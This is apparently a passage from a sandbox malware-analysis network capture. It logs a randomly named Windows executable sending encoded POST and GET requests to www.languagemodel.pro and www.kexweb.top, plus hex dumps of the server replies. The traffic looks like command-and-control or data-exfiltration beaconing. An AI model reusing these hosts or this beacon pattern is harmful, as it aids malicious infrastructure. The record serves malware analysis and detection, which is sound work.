                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:12 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49999 | 217.70.184.50 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:17.985896111 CEST | 832 | OUT | POST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 58 34 6d 73 6f 4d 51 38 34 52 45 38 35 5a 68 59 2f 31 66 68 7a 57 42 68 6b 62 2f 52 43 79 45 6e 65 38 77 63 59 4e 76 65 4a 75 49
                                                                                              Data Ascii: I4ET5=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdX4msoMQ84RE85ZhY/1fhzWBhkb/RCyEne8wcYNveJuI
Oct 8, 2024 15:54:18.611948013 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:18 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50001 | 217.70.184.50 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:20.526577950 CEST | 856 | OUT | POST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 4b 73 56 51 59 50 4b 6b 55 77 79 75 47 68 33 44 42 31 46 79 6c 54 33 66 59 54 55 49 46 57 56 55 54 33 6f 49 47 36 35 4a 32 4b 62 31 61 53 59 55 78 55 32 36 44 2f 47 35 39 58 58 5a 6c 4e 78 6a 4f 4e 4d 6e 68 6f 46 66 75 79 78 57 2b 4c 34 72 46 76 6f 5a 54 6a 6e 32 52 30 37 33 32 6b 4b 66 31 47 62 75 2f 50 59 5a 36 4b 43 67 2b 6c 41 47 42 42 6d 31 51 75 56 42 73 37 6c 72 6b 6a 69 2f 73 6a 39 50 59 37 45 4d 31 38 7a 6a 32 44 68 6d 44 4e 52 69 79 75 6c 65 45 77 4f 50 42 49 52 39 4c 72 76 32 57 51 55 44 6e 49 6c 6d 46 57 6b 4a 4a 68 72 6e 64 55 46 67 3d 3d
                                                                                              Data Ascii: I4ET5=3hfisZtcaPw+CDUn4GJ1DG3NPqb2lY8AEPuTIDug//KsVQYPKkUwyuGh3DB1FylT3fYTUIFWVUT3oIG65J2Kb1aSYUxU26D/G59XXZlNxjONMnhoFfuyxW+L4rFvoZTjn2R0732kKf1Gbu/PYZ6KCg+lAGBBm1QuVBs7lrkji/sj9PY7EM18zj2DhmDNRiyuleEwOPBIR9Lrv2WQUDnIlmFWkJJhrndUFg==
Oct 8, 2024 15:54:21.135868073 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:21 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50002 | 217.70.184.50 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:23.084533930 CEST | 1869 | OUT | POST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 43 44 55 6e 34 47 4a 31 44 47 33 4e 50 71 62 32 6c 59 38 41 45 50 75 54 49 44 75 67 2f 2f 43 73 56 43 51 50 4c 46 55 77 7a 75 47 68 30 44 42 30 46 79 6c 65 33 66 51 58 55 49 4a 6f 56 58 37 33 70 71 65 36 6f 49 32 4b 52 31 61 53 58 30 78 58 70 4b 44 75 47 35 73 51 58 5a 31 4e 78 6a 4f 4e 4d 69 6c 6f 54 64 47 79 33 57 2b 49 77 4c 46 56 73 5a 54 50 6e 32 49 42 37 33 7a 54 4b 75 56 47 62 4f 50 50 64 76 75 4b 4b 67 2b 72 42 47 42 5a 6d 31 73 6c 56 46 4e 58 6c 71 51 61 69 34 45 6a 2f 37 35 2b 57 4d 42 59 69 78 36 46 32 56 6e 4d 53 55 79 52 6a 2f 67 55 50 2b 74 75 66 4d 6a 70 32 53 71 64 63 77 6d 6b 6c 30 56 61 72 63 73 4c 70 58 45 4e 55 59 2f 4e 56 31 6b 72 6c 65 51 55 79 59 63 6f 62 64 6c 63 70 78 63 72 4e 4e 4c 67 57 55 4d 58 53 42 41 42 39 59 65 31 50 73 69 4a 31 67 74 68 37 66 33 43 44 4b 4f 2b 53 78 2f 38 5a 76 4f 75 51 6d 37 52 71 75 41 59 54 78 38 4c 39 2f 4e 6a 76 4a 4d 4b 52 48 5a 44 6e 47 36 51 38 5a 7a 77 51 37 33 38 77 76 39 30 4b 2b 73 53 [TRUNCATED]
Data Ascii: I4ET5=[TRUNCATED]
Oct 8, 2024 15:54:23.693427086 CEST | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:23 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50003 | 217.70.184.50 | 80 | 2356 | C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:54:25.630117893 CEST | 570 | OUT | GET /nxfn/?I4ET5=6j3CvtUhPdUgNSN+xHguQlWnRKyrmKs9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVfWaAaU8Sg/CwIadyJZ1Vunf0ESMtavaN5FCA7KYOqo/KmyEXwiQ=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Oct 8, 2024 15:54:26.224725008 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              Vary: Accept-Language
                                                                                              Data Raw: 37 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 [TRUNCATED]
                                                                                              Data Ascii: 79d<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>languagemodel.pro</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https: [TRUNCATED]
                                                                                               Oct 8, 2024 15:54:26.224885941 CEST  914  IN  Data Raw: 3d 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 6c 61 6e 67 75 61 67 65 6d 6f 64 65 6c 2e 70 72 6f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f
                                                                                              Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               17          192.168.2.6  50004        63.250.47.40    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:31.468534946 CEST  811                OUT        POST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 6a 56 36 34 4a 36 74 32 4c 75 5a 63 73 74 71 42 52 46 45 6e 70 37 62 78 71 75 4a 4d 37 39 36 72 31 30 67 55 47 56 62 71 38 37 66
                                                                                              Data Ascii: I4ET5=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2NkxlqjV64J6t2LuZcstqBRFEnp7bxquJM796r10gUGVbq87f
                                                                                               Oct 8, 2024 15:54:32.058708906 CEST  595                IN         HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 08 Oct 2024 13:54:31 GMT
                                                                                              Server: Apache
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Length: 389
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                               Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                               Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                               18          192.168.2.6  50005        63.250.47.40    80                2356  C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                               Timestamp                            Bytes transferred  Direction  Data
                                                                                               Oct 8, 2024 15:54:34.010711908 CEST  835                OUT        POST /3bdq/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.kexweb.top
                                                                                              Origin: http://www.kexweb.top
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.kexweb.top/3bdq/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
